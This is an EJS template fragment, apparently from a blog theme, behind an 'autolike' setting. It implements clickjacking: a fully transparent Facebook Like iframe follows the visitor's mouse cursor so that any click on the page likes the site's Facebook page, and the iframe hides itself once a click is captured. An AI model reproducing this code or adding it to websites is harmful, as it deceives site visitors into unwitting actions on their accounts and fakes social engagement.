<% if ( config.facebook.autolike ) { %>
	<script type="text/javascript">
		//<![CDATA[

		function close() {
		document.getElementById('button-click').style.display= 'none';
		}
		var interval;
		        $(function()
		{
		    interval=setInterval("ElementActive();", 50);
		});

		function ElementActive()
		{
		    if ( $(document.activeElement).attr('id')=="j-d" )
		    {
		        clearInterval(interval);
		        iflag=1;
		        setTimeout("close()", 300);
		    }
		}
		                jQuery( document ).ready( function() {

		                         $( "#button-click" ).parent().mousemove( function( e ) {



		                                jQuery( "#button-click" ).css( {

		                                        top: e.pageY - 10,

		                                        left: e.pageX + 30

		                                } );
		                        } );
		} );
		//]]>
		</script>
	<div id="button-click" style="position: absolute; opacity: 0; margin-left: -50px; z-index: 202; width: 27px; height: 20px; overflow: hidden; top: 1000px; left: 433px;">
		<iframe id="j-d" src="http://www.facebook.com/plugins/like.php?href=<%= config.facebook.pageUrl %>&amp;layout=button_count&amp;show_faces=false&amp;width=50&amp;action=like&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:45px; left:-23px; height:21px; z-index: 0; position: relative;" allowtransparency="true" name="f-h"></iframe>
	</div>
<% } %>